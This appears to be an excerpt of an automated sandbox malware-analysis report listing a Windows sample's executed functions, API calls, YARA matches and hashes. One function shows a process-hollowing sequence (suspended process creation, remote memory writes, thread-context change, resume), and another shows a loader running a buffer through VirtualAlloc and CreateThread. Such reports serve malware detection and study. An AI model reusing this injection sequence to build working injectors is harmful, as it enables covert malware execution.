ee0429 WriteProcessMemory Wow64SetThreadContext ResumeThread 13589->13591 13590->13589 15888 38f85d 15889 38f869 ___scrt_is_nonwritable_in_current_image 15888->15889 15900 38a722 EnterCriticalSection 15889->15900 15891 38f870 15901 39555f 15891->15901 15893 38f88e 15925 38f8b4 15893->15925 15900->15891 15902 39556b ___scrt_is_nonwritable_in_current_image 15901->15902 15903 395595 15902->15903 15904 395574 15902->15904 15928 38a722 EnterCriticalSection 15903->15928 15906 38b188 __dosmaperr 14 API calls 15904->15906 15907 395579 15906->15907 15908 389007 __strnicoll 41 API calls 15907->15908 15911 38f87f 15908->15911 15911->15893 15914 38f6f7 GetStartupInfoW 15911->15914 15912 3955cd 15936 3955f4 15912->15936 15913 3955a1 15913->15912 15929 3954af 15913->15929 15915 38f714 15914->15915 15917 38f7a8 15914->15917 15916 39555f 42 API calls 15915->15916 15915->15917 15918 38f73c 15916->15918 15920 38f7ad 15917->15920 15918->15917 15919 38f76c GetFileType 15918->15919 15919->15918 15922 38f7b4 15920->15922 15921 38f7f7 GetStdHandle 15921->15922 15922->15921 15923 38f859 15922->15923 15924 38f80a GetFileType 15922->15924 15923->15893 15924->15922 15940 38a76a LeaveCriticalSection 15925->15940 15927 38f89f 15928->15913 15930 38edeb __dosmaperr 14 API calls 15929->15930 15932 3954c1 15930->15932 15931 3954ce 15933 38ee48 ___free_lconv_mon 14 API calls 15931->15933 15932->15931 15935 38f430 6 API calls 15932->15935 15934 395523 15933->15934 15934->15913 15935->15932 15939 38a76a LeaveCriticalSection 15936->15939 15938 3955fb 15938->15911 15939->15938 15940->15927 14877 394d54 14878 394d8f 14877->14878 14879 394d5d 14877->14879 14880 38ebbb 41 API calls 14879->14880 14881 394d80 14880->14881 14882 394b5f 52 API calls 14881->14882 14882->14878 17507 389140 17508 38965a ___scrt_uninitialize_crt 70 API calls 17507->17508 17509 389148 17508->17509 17517 38f60c 17509->17517 17511 38914d 17512 38f6b7 14 API calls 17511->17512 17513 38915c DeleteCriticalSection 17512->17513 17513->17511 17514 389177 17513->17514 17515 38ee48 ___free_lconv_mon 14 API calls 17514->17515 17516 389182 17515->17516 17518 38f618 ___scrt_is_nonwritable_in_current_image 17517->17518 17527 38a722 EnterCriticalSection 17518->17527 17520 38f68f 17528 38f6ae 17520->17528 17523 38f663 DeleteCriticalSection 17525 38ee48 ___free_lconv_mon 14 API calls 17523->17525 17524 38931f 71 API calls 17526 38f623 17524->17526 17525->17526 17526->17520 17526->17523 17526->17524 17527->17526 17531 38a76a LeaveCriticalSection 17528->17531 17530 38f69b 17530->17511 17531->17530 18148 38e9c7 18149 38e9d2 18148->18149 18150 38e9e2 18148->18150 18154 38e9e8 18149->18154 18153 38ee48 ___free_lconv_mon 14 API calls 18153->18150 18155 38e9fd 18154->18155 18156 38ea03 18154->18156 18158 38ee48 ___free_lconv_mon 14 API calls 18155->18158 18157 38ee48 ___free_lconv_mon 14 API calls 18156->18157 18159 38ea0f 18157->18159 18158->18156 18160 38ee48 ___free_lconv_mon 14 API calls 18159->18160 18161 38ea1a 18160->18161 18162 38ee48 ___free_lconv_mon 14 API calls 18161->18162 18163 38ea25 18162->18163 18164 38ee48 ___free_lconv_mon 14 API calls 18163->18164 18165 38ea30 18164->18165 18166 38ee48 ___free_lconv_mon 14 API calls 18165->18166 18167 38ea3b 18166->18167 18168 38ee48 ___free_lconv_mon 14 API calls 18167->18168 18169 38ea46 18168->18169 18170 38ee48 ___free_lconv_mon 14 API calls 18169->18170 18171 38ea51 18170->18171 18172 38ee48 ___free_lconv_mon 14 API calls 18171->18172 18173 38ea5c 18172->18173 18174 38ee48 ___free_lconv_mon 14 API calls 18173->18174 18175 38ea6a 18174->18175 18180 38e814 18175->18180 18181 38e820 ___scrt_is_nonwritable_in_current_image 18180->18181 18196 38a722 EnterCriticalSection 18181->18196 18183 38e854 18197 38e873 18183->18197 18186 38e82a 18186->18183 18187 38ee48 ___free_lconv_mon 14 API calls 18186->18187 18187->18183 18188 38e87f 18189 38e88b ___scrt_is_nonwritable_in_current_image 18188->18189 18201 38a722 EnterCriticalSection 18189->18201 18191 38e895 18192 38eab5 __dosmaperr 14 API calls 18191->18192 18193 38e8a8 18192->18193 18202 38e8c8 18193->18202 18196->18186 18200 38a76a LeaveCriticalSection 18197->18200 18199 38e861 18199->18188 18200->18199 18201->18191 18205 38a76a LeaveCriticalSection 18202->18205 18204 38e8b6 18204->18153 18205->18204

                                                                                    Executed Functions

                                                                                    Function 00EE018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282threadinjectionmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00EE02FC
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00EE030F
                                                                                    • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00EE032D
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EE0351
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 00EE037C
                                                                                    • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 00EE03D4
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 00EE041F
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00EE045D
                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00EE0499
                                                                                    • ResumeThread.KERNELBASE(?), ref: 00EE04A8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105430536.0000000000EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                    • String ID: GetP$Load$aryA$ress
                                                                                    • API String ID: 2687962208-977067982
                                                                                    • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                    • Instruction ID: ecc3f3ca77bdda4e38d6ce1559ea7f5cfb11a79a23ad80c1bc9df08696ce3a8f
                                                                                    • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                    • Instruction Fuzzy Hash: F3B1F67260028AAFDB60CF69CC80BDA77A5FF88714F158524EA0CEB341D774FA418B94
                                                                                    Function 0039547E Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 387 39547e-395496 GetPEB 388 395498-39549c call 38f1a6 387->388 389 3954a7-3954a9 387->389 392 3954a1-3954a5 388->392 391 3954aa-3954ae 389->391 392->389 392->391
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                                                                    • Instruction ID: e638ab17764ce1768e1ad668670cc96f2cc7bede7a238c443a55bd16d4a43c43
                                                                                    • Opcode Fuzzy Hash: 6d3a586ec2da16d7fd3ee7ee03ae3402aab8ac5a3c6cbba84838bbe677f8115f
                                                                                    • Instruction Fuzzy Hash: 9AE08C32A11228EBCB66DBCAC909D8AF3FCEB44B11B1100AAF501D3100C270DE80CBD0
                                                                                    Function 0038C1CD Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                                                                    • Instruction ID: 6358bb1a96622d0629f0182b5ce72377694c2bbcf7b85a1898320f4e97c475d8
                                                                                    • Opcode Fuzzy Hash: 4c992419eee8842309e7582ba631cfc6caef1f6ffe052a819ae54955aa5ef9da
                                                                                    • Instruction Fuzzy Hash: A8C08C34010A0047CE2BA9248AB53A43358A392782F8025CCC402CBA43C52E9DC2D720
                                                                                    Function 0039C217 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 81librarymemoryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0038172B: __EH_prolog3_catch.LIBCMT ref: 00381732
                                                                                      • Part of subcall function 0038172B: _strlen.LIBCMT ref: 0038174A
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0039C234
                                                                                      • Part of subcall function 003815B7: _strlen.LIBCMT ref: 003815CF
                                                                                    • _strlen.LIBCMT ref: 0039C24F
                                                                                    • _strlen.LIBCMT ref: 0039C265
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0039C282
                                                                                    • VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040), ref: 0039C2A0
                                                                                      • Part of subcall function 0039C000: _Deallocate.LIBCONCRT ref: 0039C097
                                                                                      • Part of subcall function 0039C0A0: _Deallocate.LIBCONCRT ref: 0039C1CB
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00000188,003A7AC0,00000000,00000000), ref: 0039C2D1
                                                                                    • WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000), ref: 0039C2DB
                                                                                      • Part of subcall function 00381644: _Deallocate.LIBCONCRT ref: 00381653
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strlen$Deallocate$AddressAllocCreateH_prolog3_catchHandleModuleObjectProcSingleThreadVirtualWait
                                                                                    • String ID: Cons$Free$kernel32.dll$ole
                                                                                    • API String ID: 2500176202-3464035140
                                                                                    • Opcode ID: 78230aa668c0b4acbe7a1df60faf1ba55649a7e6bc4587f4f2100aef34eca918
                                                                                    • Instruction ID: 54abdfd708ad86a2e12025a5ab07b72e00f90da95a2de125834a09c77fc72c76
                                                                                    • Opcode Fuzzy Hash: 78230aa668c0b4acbe7a1df60faf1ba55649a7e6bc4587f4f2100aef34eca918
                                                                                    • Instruction Fuzzy Hash: 5D216272900308BEDB12B7B4EC8ADBF777CEF45754F500459F411AA291DA749D06C724
                                                                                    Function 0038F058 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 47 38f058-38f064 48 38f0f6-38f0f9 47->48 49 38f069-38f07a 48->49 50 38f0ff 48->50 52 38f07c-38f07f 49->52 53 38f087-38f0a0 LoadLibraryExW 49->53 51 38f101-38f105 50->51 54 38f11f-38f121 52->54 55 38f085 52->55 56 38f0a2-38f0ab GetLastError 53->56 57 38f106-38f116 53->57 54->51 61 38f0f3 55->61 58 38f0ad-38f0bf call 38e788 56->58 59 38f0e4-38f0f1 56->59 57->54 60 38f118-38f119 FreeLibrary 57->60 58->59 64 38f0c1-38f0d3 call 38e788 58->64 59->61 60->54 61->48 64->59 67 38f0d5-38f0e2 LoadLibraryExW 64->67 67->57 67->59
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,0038F165,?,?,00000000,00000000,?,?,0038F38F,00000021,FlsSetValue,003A02C0,003A02C8,00000000), ref: 0038F119
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 77216eb96de98b60995c8e80b430e5ed28e0524e5ed42f4638c751b201d87ebd
                                                                                    • Instruction ID: 5645cb83f1f94f31789ea291e483f051bfc96df5b46b5423144000e40fdd740a
                                                                                    • Opcode Fuzzy Hash: 77216eb96de98b60995c8e80b430e5ed28e0524e5ed42f4638c751b201d87ebd
                                                                                    • Instruction Fuzzy Hash: D9219076A01710AFEB23BB65EC45A9A376CAB41764F2601A1E906A7291E731ED01C7E0
                                                                                    Function 00392A91 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 68 392a91-392aaa 69 392aac-392abc call 38b34b 68->69 70 392ac0-392ac5 68->70 69->70 77 392abe 69->77 71 392ad4-392afa call 393c28 70->71 72 392ac7-392ad1 70->72 78 392c6d-392c7e call 384791 71->78 79 392b00-392b0b 71->79 72->71 77->70 81 392b11-392b16 79->81 82 392c60 79->82 84 392b18-392b21 call 384b20 81->84 85 392b2b-392b36 call 391e71 81->85 86 392c62 82->86 93 392b41-392b45 84->93 94 392b23-392b29 84->94 85->93 95 392b38 85->95 89 392c64-392c6b call 384522 86->89 89->78 93->86 97 392b4b-392b62 call 393c28 93->97 98 392b3e 94->98 95->98 97->86 101 392b68-392b7a call 38f4f2 97->101 98->93 103 392b7f-392b83 101->103 104 392b9e-392ba0 103->104 105 392b85-392b8d 103->105 104->86 106 392b8f-392b94 105->106 107 392bc7-392bd3 105->107 110 392b9a-392b9c 106->110 111 392c46-392c48 106->111 108 392c52 107->108 109 392bd5-392bd7 107->109 114 392c54-392c5b call 384522 108->114 112 392bd9-392be2 call 384b20 109->112 113 392bec-392bf7 call 391e71 109->113 110->104 115 392ba5-392bbf call 38f4f2 110->115 111->89 112->114 124 392be4-392bea 112->124 113->114 125 392bf9 113->125 114->104 115->111 126 392bc5 115->126 127 392bff-392c04 124->127 125->127 126->104 127->114 128 392c06-392c1e call 38f4f2 127->128 128->114 131 392c20-392c27 128->131 132 392c29-392c2a 131->132 133 392c4a-392c50 131->133 134 392c2b-392c3d call 393ca4 132->134 133->134 134->114 137 392c3f-392c45 call 384522 134->137 137->111
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 00392B18
                                                                                    • __alloca_probe_16.LIBCMT ref: 00392BD9
                                                                                    • __freea.LIBCMT ref: 00392C40
                                                                                      • Part of subcall function 00391E71: HeapAlloc.KERNEL32(00000000,00000000,?,?,00385315,?,?,?,?,?,003810FC,?,00000001), ref: 00391EA3
                                                                                    • __freea.LIBCMT ref: 00392C55
                                                                                    • __freea.LIBCMT ref: 00392C65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1096550386-0
                                                                                    • Opcode ID: 02294e7ded30756a6a5f002de19a0bfce684aa9fcb95a829e2d6eb9f351983eb
                                                                                    • Instruction ID: 6ff925b5ac10260b2ccc55cd541ab57dca8442e145f0f4cefa94ea367905bf6e
                                                                                    • Opcode Fuzzy Hash: 02294e7ded30756a6a5f002de19a0bfce684aa9fcb95a829e2d6eb9f351983eb
                                                                                    • Instruction Fuzzy Hash: A5519172600616BFEF27AF64DC81EBF77A9EF44350B260169FD09EA150EA30CD148B60
                                                                                    Function 0038F4F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 140 38f4f2-38f501 call 38f024 143 38f52a-38f544 call 38f54f LCMapStringW 140->143 144 38f503-38f528 LCMapStringEx 140->144 148 38f54a-38f54c 143->148 144->148
                                                                                    APIs
                                                                                    • LCMapStringEx.KERNELBASE(?,00392B7F,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0038F526
                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00392B7F,?,?,00000000,?,00000000), ref: 0038F544
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: |,8
                                                                                    • API String ID: 2568140703-3013188374
                                                                                    • Opcode ID: cd137eb19b550768f95cc5bbd5d94267cd014013fb34258c8eefc9009b0d55f7
                                                                                    • Instruction ID: 29823c59cdda8648387b7414c5a1fd09e354cb20fd14b8bb5b58ebce85f1739b
                                                                                    • Opcode Fuzzy Hash: cd137eb19b550768f95cc5bbd5d94267cd014013fb34258c8eefc9009b0d55f7
                                                                                    • Instruction Fuzzy Hash: BCF0683200021ABBCF136FA1DC059EE3F6AFB58760F058161FA192A121C632CA31AB90
                                                                                    Function 0038C159 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,0038C153,00000016,00388E0A,?,?,ECD46234,00388E0A,?), ref: 0038C16A
                                                                                    • TerminateProcess.KERNEL32(00000000,?,0038C153,00000016,00388E0A,?,?,ECD46234,00388E0A,?), ref: 0038C171
                                                                                    • ExitProcess.KERNEL32 ref: 0038C183
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                    • String ID:
                                                                                    • API String ID: 1703294689-0
                                                                                    • Opcode ID: 4d59c9d16366d2b95583fdceab782bff499f3c38bce6b700187f36a01419e19e
                                                                                    • Instruction ID: e363cf1e381aa46b5d760637f944cf0ae1ccc3c1589832a28cf2a0b08f01c991
                                                                                    • Opcode Fuzzy Hash: 4d59c9d16366d2b95583fdceab782bff499f3c38bce6b700187f36a01419e19e
                                                                                    • Instruction Fuzzy Hash: 07D09232010248ABCF133F71ED4E9593F2ABF41385F445051B9098A232CB3799639BA0
                                                                                    Function 00394DAF Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 156 394daf-394dd7 call 3948df 159 394ddd-394de3 156->159 160 394f9f-394fa0 call 394950 156->160 161 394de6-394dec 159->161 165 394fa5-394fa7 160->165 163 394eee-394f0d call 385f00 161->163 164 394df2-394dfe 161->164 175 394f10-394f15 163->175 164->161 166 394e00-394e06 164->166 168 394fa8-394fb6 call 384791 165->168 170 394e0c-394e18 IsValidCodePage 166->170 171 394ee6-394ee9 166->171 170->171 174 394e1e-394e25 170->174 171->168 176 394e4d-394e5a GetCPInfo 174->176 177 394e27-394e33 174->177 178 394f52-394f5c 175->178 179 394f17-394f1c 175->179 182 394eda-394ee0 176->182 183 394e5c-394e7b call 385f00 176->183 180 394e37-394e43 call 3949b3 177->180 178->175 181 394f5e-394f88 call 3948a1 178->181 184 394f4f 179->184 185 394f1e-394f26 179->185 192 394e48 180->192 196 394f89-394f98 181->196 182->160 182->171 183->180 197 394e7d-394e84 183->197 184->178 186 394f28-394f2b 185->186 187 394f47-394f4d 185->187 191 394f2d-394f33 186->191 187->179 187->184 191->187 195 394f35-394f45 191->195 192->165 195->187 195->191 196->196 198 394f9a 196->198 199 394eb0-394eb3 197->199 200 394e86-394e8b 197->200 198->160 201 394eb8-394ebf 199->201 200->199 202 394e8d-394e95 200->202 201->201 205 394ec1-394ed5 call 3948a1 201->205 203 394ea8-394eae 202->203 204 394e97-394e9e 202->204 203->199 203->200 206 394e9f-394ea6 204->206 205->180 206->203 206->206
                                                                                    APIs
                                                                                      • Part of subcall function 003948DF: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 0039490A
                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00394BF6,?,00000000,?,00000000,?), ref: 00394E10
                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00394BF6,?,00000000,?,00000000,?), ref: 00394E52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CodeInfoPageValid
                                                                                    • String ID:
                                                                                    • API String ID: 546120528-0
                                                                                    • Opcode ID: 3079d7985eb68ce4f5e1ff58b4e741ffa0cdcdc0338b1b6ab9479b602108faf6
                                                                                    • Instruction ID: 37c8c863a0b254405df8b2386a28024c6ce60eed1a42ebbb8080d34fafdc57f1
                                                                                    • Opcode Fuzzy Hash: 3079d7985eb68ce4f5e1ff58b4e741ffa0cdcdc0338b1b6ab9479b602108faf6
                                                                                    • Instruction Fuzzy Hash: 1951EE71E042469EDF22CF35C881AABBBE9FF81304F1941AED0868B651E7759947CB90
                                                                                    Function 003949B3 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 217 3949b3-3949d5 218 3949db-3949ed GetCPInfo 217->218 219 394aee-394b14 217->219 218->219 221 3949f3-3949fa 218->221 220 394b19-394b1e 219->220 222 394b28-394b2e 220->222 223 394b20-394b26 220->223 224 3949fc-394a06 221->224 226 394b3a 222->226 227 394b30-394b33 222->227 225 394b36-394b38 223->225 224->224 228 394a08-394a1b 224->228 230 394b3c-394b4e 225->230 226->230 227->225 229 394a3c-394a3e 228->229 231 394a1d-394a24 229->231 232 394a40-394a77 call 392988 call 392c7f 229->232 230->220 233 394b50-394b5e call 384791 230->233 234 394a33-394a35 231->234 243 394a7c-394ab1 call 392c7f 232->243 237 394a37-394a3a 234->237 238 394a26-394a28 234->238 237->229 238->237 241 394a2a-394a32 238->241 241->234 246 394ab3-394abd 243->246 247 394acb-394acd 246->247 248 394abf-394ac9 246->248 249 394adb 247->249 250 394acf-394ad9 247->250 251 394add-394aea 248->251 249->251 250->251 251->246 252 394aec 251->252 252->233
                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(E8458D00,?,00394C02,00394BF6,00000000), ref: 003949E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Info
                                                                                    • String ID:
                                                                                    • API String ID: 1807457897-0
